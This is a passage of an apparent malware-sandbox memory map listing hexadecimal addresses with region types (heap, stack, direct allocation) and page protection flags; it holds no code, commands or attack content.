stack
|
page read and write
|
||
76FE000
|
stack
|
page read and write
|
||
4380000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
7FD88000
|
direct allocation
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
31CE000
|
heap
|
page read and write
|
||
113A000
|
trusted library allocation
|
page execute and read and write
|
||
569F000
|
stack
|
page read and write
|
||
20DA000
|
direct allocation
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
1CE891BB000
|
heap
|
page read and write
|
||
17CE000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
20E8000
|
direct allocation
|
page read and write
|
||
2D7D000
|
heap
|
page read and write
|
||
4430000
|
direct allocation
|
page execute and read and write
|
||
5340000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
6AE8000
|
direct allocation
|
page read and write
|
||
52B0000
|
heap
|
page read and write
|
||
29C0000
|
heap
|
page read and write
|
||
17B3000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
4050000
|
direct allocation
|
page execute and read and write
|
||
6B6000
|
unkown
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
361000
|
unkown
|
page execute read
|
||
29BA000
|
heap
|
page read and write
|
||
229B000
|
direct allocation
|
page read and write
|
||
17EB000
|
heap
|
page read and write
|
||
6B6000
|
unkown
|
page write copy
|
||
74E000
|
stack
|
page read and write
|
||
6771000
|
heap
|
page read and write
|
||
7FD2E000
|
direct allocation
|
page read and write
|
||
892F87E000
|
unkown
|
page readonly
|
||
2B10000
|
heap
|
page read and write
|
||
3468000
|
direct allocation
|
page read and write
|
||
E12000
|
heap
|
page read and write
|
||
2FCE000
|
trusted library allocation
|
page read and write
|
||
2ADA000
|
heap
|
page read and write
|
||
E10000
|
heap
|
page read and write
|
||
23B0000
|
direct allocation
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
1130000
|
trusted library allocation
|
page read and write
|
||
7A3E000
|
stack
|
page read and write
|
||
31E1000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
2593000
|
heap
|
page read and write
|
||
AFB000
|
stack
|
page read and write
|
||
68E000
|
stack
|
page read and write
|
||
265F000
|
direct allocation
|
page read and write
|
||
29C5000
|
heap
|
page read and write
|
||
8AD000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
BC0000
|
heap
|
page read and write
|
||
373E000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
31D0000
|
trusted library allocation
|
page read and write
|
||
11D0000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3C20000
|
direct allocation
|
page execute and read and write
|
||
3820000
|
direct allocation
|
page execute and read and write
|
||
6C5C000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
29EE000
|
stack
|
page read and write
|
||
17B3000
|
heap
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute and write copy
|
||
2C90000
|
heap
|
page read and write
|
||
451B000
|
direct allocation
|
page read and write
|
||
3C10000
|
direct allocation
|
page execute and read and write
|
||
3DF0000
|
direct allocation
|
page execute and read and write
|
||
7B5C000
|
heap
|
page read and write
|
||
70F000
|
stack
|
page read and write
|
||
4F00000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
360000
|
unkown
|
page readonly
|
||
2CDE000
|
stack
|
page read and write
|
||
1147000
|
trusted library allocation
|
page execute and read and write
|
||
36CD000
|
direct allocation
|
page read and write
|
||
228B000
|
direct allocation
|
page read and write
|
||
11D5000
|
heap
|
page read and write
|
||
324E000
|
heap
|
page read and write
|
||
3C70000
|
direct allocation
|
page execute and read and write
|
||
A650000
|
trusted library allocation
|
page read and write
|
||
1F03FEB0000
|
heap
|
page read and write
|
||
3390000
|
direct allocation
|
page execute and read and write
|
||
A84000
|
heap
|
page read and write
|
||
29C5000
|
heap
|
page read and write
|
||
274000A7000
|
heap
|
page read and write
|
||
6870000
|
heap
|
page read and write
|
||
5410000
|
heap
|
page read and write
|
||
2CED000
|
stack
|
page read and write
|
||
3720000
|
direct allocation
|
page execute and read and write
|
||
1B85000
|
heap
|
page read and write
|
||
9ACE000
|
stack
|
page read and write
|
||
274056F9000
|
heap
|
page read and write
|
||
941E000
|
stack
|
page read and write
|
||
273FFEB0000
|
heap
|
page read and write
|
||
7720000
|
trusted library allocation
|
page read and write
|
||
4623000
|
direct allocation
|
page read and write
|
||
310E000
|
stack
|
page read and write
|
||
1CE89270000
|
heap
|
page read and write
|
||
22F9000
|
direct allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3580000
|
direct allocation
|
page execute and read and write
|
||
225F000
|
direct allocation
|
page read and write
|
||
29D2000
|
heap
|
page read and write
|
||
6B6000
|
unkown
|
page write copy
|
||
3E90000
|
direct allocation
|
page execute and read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
3F40000
|
direct allocation
|
page execute and read and write
|
||
31A9000
|
heap
|
page read and write
|
||
4F1F000
|
heap
|
page read and write
|
||
2DA6000
|
heap
|
page read and write
|
||
346F000
|
direct allocation
|
page read and write
|
||
17EB000
|
heap
|
page read and write
|
||
29BA000
|
heap
|
page read and write
|
||
892F3FE000
|
stack
|
page read and write
|
||
2DDE000
|
stack
|
page read and write
|
||
5AD000
|
unkown
|
page read and write
|
||
3E40000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
34AC000
|
direct allocation
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
969E000
|
stack
|
page read and write
|
||
3A00000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
37D0000
|
direct allocation
|
page execute and read and write
|
||
748000
|
heap
|
page read and write
|
||
3700000
|
direct allocation
|
page execute and read and write
|
||
2686000
|
direct allocation
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
2CDF000
|
stack
|
page read and write
|
||
4F75000
|
heap
|
page read and write
|
||
502000
|
unkown
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
17E5000
|
heap
|
page read and write
|
||
3EA0000
|
direct allocation
|
page execute and read and write
|
||
12C0000
|
heap
|
page read and write
|
||
27401050000
|
trusted library section
|
page readonly
|
||
322E000
|
heap
|
page read and write
|
||
4F04000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7D1F000
|
stack
|
page read and write
|
||
6F9000
|
heap
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
E1F000
|
heap
|
page read and write
|
||
3DC0000
|
direct allocation
|
page execute and read and write
|
||
7F4000
|
heap
|
page read and write
|
||
3441000
|
direct allocation
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
E3A000
|
heap
|
page read and write
|
||
93DE000
|
stack
|
page read and write
|
||
27400013000
|
heap
|
page read and write
|
||
2986000
|
heap
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
3360000
|
direct allocation
|
page execute and read and write
|
||
2B26000
|
heap
|
page read and write
|
||
BC8000
|
stack
|
page read and write
|
||
274054B4000
|
trusted library allocation
|
page read and write
|
||
72F000
|
stack
|
page read and write
|
||
13EE000
|
stack
|
page read and write
|
||
3D80000
|
direct allocation
|
page execute and read and write
|
||
3180000
|
heap
|
page read and write
|
||
892EA7C000
|
stack
|
page read and write
|
||
11AE000
|
stack
|
page read and write
|
||
4FEB000
|
heap
|
page read and write
|
||
318E000
|
stack
|
page read and write
|
||
29F0000
|
heap
|
page read and write
|
||
74D000
|
heap
|
page read and write
|
||
21A0000
|
heap
|
page read and write
|
||
3B70000
|
direct allocation
|
page execute and read and write
|
||
4F75000
|
heap
|
page read and write
|
||
29CC000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
63D000
|
stack
|
page read and write
|
||
2AE1000
|
heap
|
page read and write
|
||
27405702000
|
heap
|
page read and write
|
||
3E00000
|
direct allocation
|
page execute and read and write
|
||
6C0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2CEF000
|
stack
|
page read and write
|
||
892F47E000
|
unkown
|
page readonly
|
||
6500000
|
direct allocation
|
page read and write
|
||
5F80000
|
heap
|
page read and write
|
||
7FE40000
|
direct allocation
|
page read and write
|
||
55C0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
31E5000
|
heap
|
page read and write
|
||
61E88000
|
unkown
|
page write copy
|
||
300F000
|
stack
|
page read and write
|
||
7B40000
|
heap
|
page read and write
|
||
2ADA000
|
heap
|
page read and write
|
||
4D50000
|
heap
|
page read and write
|
||
450F000
|
stack
|
page read and write
|
||
31EA000
|
heap
|
page read and write
|
||
6B1000
|
unkown
|
page read and write
|
||
2930000
|
heap
|
page read and write
|
||
4040000
|
direct allocation
|
page execute and read and write
|
||
7720000
|
trusted library allocation
|
page read and write
|
||
3384000
|
direct allocation
|
page execute and read and write
|
||
2740561F000
|
heap
|
page read and write
|
||
3CC0000
|
direct allocation
|
page execute and read and write
|
||
22CD000
|
direct allocation
|
page read and write
|
||
2AEB000
|
heap
|
page read and write
|
||
22E4000
|
direct allocation
|
page read and write
|
||
1E7000
|
heap
|
page read and write
|
||
633E000
|
stack
|
page read and write
|
||
6B5D000
|
direct allocation
|
page read and write
|
||
31EC000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
E14000
|
heap
|
page read and write
|
||
1CE89178000
|
heap
|
page read and write
|
||
2DC0000
|
heap
|
page read and write
|
||
2267000
|
direct allocation
|
page read and write
|
||
14C6000
|
heap
|
page read and write
|
||
27400075000
|
heap
|
page read and write
|
||
27401020000
|
trusted library section
|
page readonly
|
||
361000
|
unkown
|
page execute read
|
||
4EB0000
|
trusted library allocation
|
page read and write
|
||
5EE000
|
unkown
|
page read and write
|
||
31E1000
|
heap
|
page read and write
|
||
4080000
|
direct allocation
|
page execute and read and write
|
||
892F0FE000
|
stack
|
page read and write
|
||
34A0000
|
heap
|
page read and write
|
||
2D4B000
|
heap
|
page read and write
|
||
17BB000
|
heap
|
page read and write
|
||
40C0000
|
direct allocation
|
page execute and read and write
|
||
8200000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2AA0000
|
heap
|
page read and write
|
||
7F3000
|
heap
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
31A0000
|
heap
|
page read and write
|
||
7FDF0000
|
direct allocation
|
page read and write
|
||
50D000
|
unkown
|
page read and write
|
||
981000
|
heap
|
page read and write
|
||
31DA000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
3400000
|
direct allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
56C0000
|
heap
|
page read and write
|
||
5F2000
|
unkown
|
page readonly
|
||
26AA000
|
direct allocation
|
page read and write
|
||
1740000
|
direct allocation
|
page read and write
|
||
324A000
|
heap
|
page read and write
|
||
1140000
|
trusted library allocation
|
page read and write
|
||
7E7000
|
heap
|
page read and write
|
||
2AE1000
|
heap
|
page read and write
|
||
B6B000
|
stack
|
page read and write
|
||
26E3000
|
direct allocation
|
page read and write
|
||
4350000
|
direct allocation
|
page execute and read and write
|
||
29BA000
|
heap
|
page read and write
|
||
4D0F000
|
stack
|
page read and write
|
||
2AD4000
|
heap
|
page read and write
|
||
4E6E000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2F2C000
|
stack
|
page read and write
|
||
6B6000
|
unkown
|
page write copy
|
||
3A60000
|
direct allocation
|
page execute and read and write
|
||
3323000
|
direct allocation
|
page read and write
|
||
2AAC000
|
heap
|
page read and write
|
||
3760000
|
direct allocation
|
page execute and read and write
|
||
6774000
|
heap
|
page read and write
|
||
17AC000
|
heap
|
page read and write
|
||
22B0000
|
direct allocation
|
page read and write
|
||
892E87E000
|
stack
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
17EA000
|
heap
|
page read and write
|
||
2BED000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
41F0000
|
direct allocation
|
page execute and read and write
|
||
322E000
|
stack
|
page read and write
|
||
888000
|
unkown
|
page execute and write copy
|
||
A84000
|
heap
|
page read and write
|
||
6B7000
|
unkown
|
page write copy
|
||
76BC000
|
stack
|
page read and write
|
||
2B7E000
|
stack
|
page read and write
|
||
2160000
|
direct allocation
|
page execute and read and write
|
||
1740000
|
direct allocation
|
page read and write
|
||
175A000
|
heap
|
page read and write
|
||
63D000
|
stack
|
page read and write
|
||
3186000
|
heap
|
page read and write
|
||
3232000
|
heap
|
page read and write
|
||
27405450000
|
trusted library allocation
|
page read and write
|
||
8200000
|
trusted library allocation
|
page read and write
|
||
3DB0000
|
direct allocation
|
page execute and read and write
|
||
5EE000
|
unkown
|
page read and write
|
||
4DB1000
|
heap
|
page read and write
|
||
3660000
|
direct allocation
|
page execute and read and write
|
||
18D9000
|
heap
|
page read and write
|
||
180000
|
stack
|
page read and write
|
||
3F10000
|
direct allocation
|
page execute and read and write
|
||
2CB0000
|
trusted library allocation
|
page execute and read and write
|
||
24E0000
|
direct allocation
|
page read and write
|
||
34A6000
|
heap
|
page read and write
|
||
7FCA0000
|
direct allocation
|
page read and write
|
||
738000
|
heap
|
page read and write
|
||
3302000
|
direct allocation
|
page read and write
|
||
40A0000
|
direct allocation
|
page execute and read and write
|
||
E32000
|
heap
|
page read and write
|
||
892F97E000
|
unkown
|
page readonly
|
||
31E1000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
349D000
|
direct allocation
|
page read and write
|
||
315F000
|
stack
|
page read and write
|
||
2AFE000
|
stack
|
page read and write
|
||
34AA000
|
direct allocation
|
page read and write
|
||
34A9000
|
heap
|
page read and write
|
||
29AE000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
17BB000
|
heap
|
page read and write
|
||
1FB8000
|
direct allocation
|
page read and write
|
||
3710000
|
direct allocation
|
page execute and read and write
|
||
7BF000
|
heap
|
page read and write
|
||
31DA000
|
heap
|
page read and write
|
||
3BF0000
|
direct allocation
|
page execute and read and write
|
||
4B0000
|
heap
|
page read and write
|
||
72D000
|
heap
|
page read and write
|
||
5670000
|
heap
|
page read and write
|
||
185000
|
stack
|
page read and write
|
||
72A000
|
heap
|
page read and write
|
||
DF8000
|
heap
|
page read and write
|
||
11DB000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
4DB1000
|
heap
|
page read and write
|
||
7FD5E000
|
direct allocation
|
page read and write
|
||
5800000
|
heap
|
page read and write
|
||
23D3000
|
direct allocation
|
page read and write
|
||
22729BA3000
|
heap
|
page read and write
|
||
274054A0000
|
trusted library allocation
|
page read and write
|
||
61E8A000
|
unkown
|
page readonly
|
||
580000
|
heap
|
page read and write
|
||
2F9C000
|
stack
|
page read and write
|
||
4556000
|
direct allocation
|
page read and write
|
||
2AA9000
|
heap
|
page read and write
|
||
52A0000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
2F9B000
|
trusted library allocation
|
page read and write
|
||
6BA000
|
unkown
|
page write copy
|
||
2ACE000
|
heap
|
page read and write
|
||
2AE1000
|
heap
|
page read and write
|
||
96B000
|
heap
|
page read and write
|
||
24A0000
|
direct allocation
|
page read and write
|
||
3230000
|
heap
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
393F000
|
stack
|
page read and write
|
||
8200000
|
trusted library allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
1750000
|
heap
|
page read and write
|
||
6786000
|
heap
|
page read and write
|
||
892F27E000
|
unkown
|
page readonly
|
||
A84000
|
heap
|
page read and write
|
||
29CB000
|
heap
|
page read and write
|
||
6BA000
|
unkown
|
page write copy
|
||
35F3000
|
heap
|
page read and write
|
||
18D0000
|
heap
|
page read and write
|
||
1006000
|
heap
|
page read and write
|
||
1CE891C4000
|
heap
|
page read and write
|
||
6BA000
|
unkown
|
page write copy
|
||
227A000
|
direct allocation
|
page read and write
|
||
7FE43000
|
direct allocation
|
page read and write
|
||
347F000
|
direct allocation
|
page read and write
|
||
27405471000
|
trusted library allocation
|
page read and write
|
||
929E000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7FDBE000
|
direct allocation
|
page read and write
|
||
4F2F000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
C6D000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
5B3000
|
unkown
|
page read and write
|
||
775000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
274054D9000
|
trusted library allocation
|
page read and write
|
||
B00000
|
heap
|
page read and write
|
||
34B0000
|
heap
|
page read and write
|
||
179E000
|
heap
|
page read and write
|
||
9C8000
|
unkown
|
page execute and read and write
|
||
19E000
|
stack
|
page read and write
|
||
5F2000
|
unkown
|
page readonly
|
||
3EF0000
|
direct allocation
|
page execute and read and write
|
||
3A80000
|
direct allocation
|
page execute and read and write
|
||
29CA000
|
heap
|
page read and write
|
||
975000
|
heap
|
page read and write
|
||
267F000
|
direct allocation
|
page read and write
|
||
1296000
|
heap
|
page read and write
|
||
772000
|
heap
|
page read and write
|
||
26B1000
|
direct allocation
|
page read and write
|
||
B9E000
|
stack
|
page read and write
|
||
32FB000
|
direct allocation
|
page read and write
|
||
2F93000
|
trusted library allocation
|
page read and write
|
||
3D40000
|
direct allocation
|
page execute and read and write
|
||
3770000
|
heap
|
page read and write
|
||
4200000
|
direct allocation
|
page execute and read and write
|
||
53B2000
|
trusted library allocation
|
page read and write
|
||
234D000
|
direct allocation
|
page read and write
|
||
34B4000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
3780000
|
direct allocation
|
page execute and read and write
|
||
7F3000
|
heap
|
page read and write
|
||
DF8000
|
heap
|
page read and write
|
||
3E70000
|
direct allocation
|
page execute and read and write
|
||
4330000
|
direct allocation
|
page execute and read and write
|
||
2D08000
|
heap
|
page read and write
|
||
73D000
|
heap
|
page read and write
|
||
3D30000
|
direct allocation
|
page execute and read and write
|
||
324F000
|
heap
|
page read and write
|
||
61E98000
|
unkown
|
page read and write
|
||
7FE4D000
|
direct allocation
|
page read and write
|
||
1CE891D4000
|
heap
|
page read and write
|
||
2CE7000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
44E6000
|
direct allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
2FE4000
|
trusted library allocation
|
page read and write
|
||
27400040000
|
heap
|
page read and write
|
||
3410000
|
heap
|
page read and write
|
||
2341000
|
direct allocation
|
page read and write
|
||
E79000
|
heap
|
page read and write
|
||
2C80000
|
heap
|
page read and write
|
||
2AEB000
|
heap
|
page read and write
|
||
3F30000
|
direct allocation
|
page execute and read and write
|
||
F7327E000
|
stack
|
page read and write
|
||
3B00000
|
direct allocation
|
page execute and read and write
|
||
2D75000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
29C1000
|
heap
|
page read and write
|
||
92DE000
|
stack
|
page read and write
|
||
3850000
|
direct allocation
|
page execute and read and write
|
||
A84000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2FA4000
|
trusted library allocation
|
page read and write
|
||
2AEB000
|
heap
|
page read and write
|
||
3353000
|
direct allocation
|
page read and write
|
||
2740008D000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
761000
|
heap
|
page read and write
|
||
3FF0000
|
direct allocation
|
page execute and read and write
|
||
37B0000
|
direct allocation
|
page execute and read and write
|
||
298F000
|
heap
|
page read and write
|
||
31EB000
|
heap
|
page read and write
|
||
308F000
|
stack
|
page read and write
|
||
3D20000
|
direct allocation
|
page execute and read and write
|
||
412000
|
unkown
|
page read and write
|
||
454F000
|
direct allocation
|
page read and write
|
||
38FF000
|
heap
|
page read and write
|
||
4180000
|
direct allocation
|
page execute and read and write
|
||
37A0000
|
heap
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
38F4000
|
heap
|
page read and write
|
||
4410000
|
direct allocation
|
page execute and read and write
|
||
324A000
|
heap
|
page read and write
|
||
4310000
|
direct allocation
|
page execute and read and write
|
||
22EB000
|
direct allocation
|
page read and write
|
||
886000
|
unkown
|
page execute and read and write
|
||
17F1000
|
heap
|
page read and write
|
||
36F8000
|
direct allocation
|
page read and write
|
||
40E0000
|
direct allocation
|
page execute and read and write
|
||
4240000
|
direct allocation
|
page execute and read and write
|
||
6FB000
|
heap
|
page read and write
|
||
41A0000
|
direct allocation
|
page execute and read and write
|
||
36A0000
|
direct allocation
|
page execute and read and write
|
||
7B93000
|
heap
|
page read and write
|
||
94E000
|
stack
|
page read and write
|
||
2F2F000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
5FB7000
|
heap
|
page read and write
|
||
810000
|
heap
|
page read and write
|
||
3A10000
|
direct allocation
|
page execute and read and write
|
||
27400F30000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
1B88000
|
heap
|
page read and write
|
||
7FD90000
|
direct allocation
|
page read and write
|
||
6F5000
|
heap
|
page read and write
|
||
3590000
|
direct allocation
|
page execute and read and write
|
||
66DE000
|
stack
|
page read and write
|
||
805000
|
heap
|
page read and write
|
||
31AA000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
8BE000
|
stack
|
page read and write
|
||
773E000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
718000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
274000B1000
|
heap
|
page read and write
|
||
274055B0000
|
trusted library allocation
|
page read and write
|
||
1CE891AC000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
6A96000
|
direct allocation
|
page read and write
|
||
1CE89150000
|
heap
|
page read and write
|
||
E15000
|
heap
|
page read and write
|
||
3420000
|
direct allocation
|
page read and write
|
||
88C6000
|
direct allocation
|
page read and write
|
||
8160000
|
trusted library allocation
|
page read and write
|
||
1CE89188000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
238D48D0000
|
heap
|
page read and write
|
||
4000000
|
direct allocation
|
page execute and read and write
|
||
A84000
|
unkown
|
page execute and read and write
|
||
26A3000
|
direct allocation
|
page read and write
|
||
34B6000
|
heap
|
page read and write
|
||
3260000
|
heap
|
page read and write
|
||
34A2000
|
heap
|
page read and write
|
||
2490000
|
heap
|
page read and write
|
||
1142000
|
trusted library allocation
|
page read and write
|
||
892EB7E000
|
unkown
|
page readonly
|
||
360000
|
unkown
|
page readonly
|
||
112D000
|
trusted library allocation
|
page execute and read and write
|
||
3310000
|
heap
|
page read and write
|
||
34BF000
|
direct allocation
|
page read and write
|
||
53D0000
|
trusted library allocation
|
page read and write
|
||
73A000
|
heap
|
page read and write
|
||
9D3000
|
unkown
|
page execute and read and write
|
||
27400900000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2740005B000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
6B1000
|
unkown
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3281000
|
heap
|
page read and write
|
||
1690000
|
heap
|
page read and write
|
||
680000
|
heap
|
page read and write
|
||
6EE000
|
stack
|
page read and write
|
||
7182000
|
trusted library allocation
|
page read and write
|
||
17CE000
|
heap
|
page read and write
|
||
3880000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
273FFF90000
|
heap
|
page read and write
|
||
11D9000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4F79000
|
heap
|
page read and write
|
||
3242000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
2C7F000
|
stack
|
page read and write
|
||
4FE7000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
661000
|
heap
|
page read and write
|
||
3281000
|
heap
|
page read and write
|
||
A660000
|
trusted library allocation
|
page execute and read and write
|
||
7F4000
|
heap
|
page read and write
|
||
2B3F000
|
stack
|
page read and write
|
||
3499000
|
direct allocation
|
page read and write
|
||
44CE000
|
stack
|
page read and write
|
||
2D75000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
27400102000
|
heap
|
page read and write
|
||
11DD000
|
heap
|
page read and write
|
||
14A0000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
7FDF8000
|
direct allocation
|
page read and write
|
||
3C00000
|
direct allocation
|
page execute and read and write
|
||
68A3000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
27401060000
|
trusted library section
|
page readonly
|
||
31C4000
|
heap
|
page read and write
|
||
5E6777F000
|
stack
|
page read and write
|
||
3CB0000
|
direct allocation
|
page execute and read and write
|
||
17DA000
|
heap
|
page read and write
|
||
27405654000
|
heap
|
page read and write
|
||
E23000
|
heap
|
page read and write
|
||
915000
|
unkown
|
page execute and read and write
|
||
33E0000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
98F000
|
unkown
|
page read and write
|
||
2740091A000
|
heap
|
page read and write
|
||
1CE891EE000
|
heap
|
page read and write
|
||
29C5000
|
heap
|
page read and write
|
||
361000
|
unkown
|
page execute read
|
||
1740000
|
direct allocation
|
page read and write
|
||
27406000000
|
heap
|
page read and write
|
||
324A000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7270000
|
trusted library allocation
|
page read and write
|
||
27400802000
|
heap
|
page read and write
|
||
36C6000
|
direct allocation
|
page read and write
|
||
745000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
5413000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
7FD32000
|
direct allocation
|
page read and write
|
||
39D0000
|
direct allocation
|
page execute and read and write
|
||
1484000
|
unkown
|
page execute and read and write
|
||
12AC000
|
heap
|
page read and write
|
||
3AC0000
|
direct allocation
|
page execute and read and write
|
||
4F83000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
6BB000
|
unkown
|
page readonly
|
||
7BC4000
|
heap
|
page read and write
|
||
2B26000
|
heap
|
page read and write
|
||
30CF000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
3905000
|
heap
|
page read and write
|
||
17DA000
|
heap
|
page read and write
|
||
C0C000
|
stack
|
page read and write
|
||
3FE0000
|
direct allocation
|
page execute and read and write
|
||
990000
|
heap
|
page read and write
|
||
4DB1000
|
heap
|
page read and write
|
||
31E5000
|
heap
|
page read and write
|
||
3750000
|
direct allocation
|
page execute and read and write
|
||
D90000
|
heap
|
page read and write
|
||
2AEB000
|
heap
|
page read and write
|
||
2D1F000
|
stack
|
page read and write
|
||
3C60000
|
direct allocation
|
page execute and read and write
|
||
2CDF000
|
stack
|
page read and write
|
||
AE0000
|
heap
|
page read and write
|
||
2B36000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
893037E000
|
unkown
|
page readonly
|
||
78F000
|
stack
|
page read and write
|
||
3BD0000
|
direct allocation
|
page execute and read and write
|
||
A84000
|
heap
|
page read and write
|
||
4F7D000
|
heap
|
page read and write
|
||
3810000
|
direct allocation
|
page execute and read and write
|
||
919D000
|
stack
|
page read and write
|
||
7C17000
|
heap
|
page read and write
|
||
1CE891BC000
|
heap
|
page read and write
|
||
3650000
|
direct allocation
|
page execute and read and write
|
||
43F0000
|
direct allocation
|
page execute and read and write
|
||
2EEE000
|
stack
|
page read and write
|
||
2993000
|
heap
|
page read and write
|
||
2333000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
2CD0000
|
trusted library allocation
|
page read and write
|
||
31A0000
|
heap
|
page read and write
|
||
5E6000
|
unkown
|
page readonly
|
||
31E5000
|
heap
|
page read and write
|
||
2392000
|
direct allocation
|
page read and write
|
||
175B000
|
heap
|
page read and write
|
||
4DA0000
|
heap
|
page read and write
|
||
3350000
|
direct allocation
|
page execute and read and write
|
||
34EC000
|
direct allocation
|
page read and write
|
||
730000
|
heap
|
page read and write
|
||
4170000
|
direct allocation
|
page execute and read and write
|
||
892FA7D000
|
stack
|
page read and write
|
||
3930000
|
direct allocation
|
page execute and read and write
|
||
2AF1000
|
heap
|
page read and write
|
||
48C000
|
heap
|
page read and write
|
||
2FB7000
|
trusted library allocation
|
page read and write
|
||
6F5000
|
heap
|
page read and write
|
||
3DD0000
|
direct allocation
|
page execute and read and write
|
||
22F2000
|
direct allocation
|
page read and write
|
||
764000
|
heap
|
page read and write
|
||
274053E0000
|
trusted library allocation
|
page read and write
|
||
5FB2000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
27405540000
|
trusted library allocation
|
page read and write
|
||
17E5000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
806000
|
heap
|
page read and write
|
||
1B80000
|
heap
|
page read and write
|
||
2993000
|
heap
|
page read and write
|
||
34C5000
|
heap
|
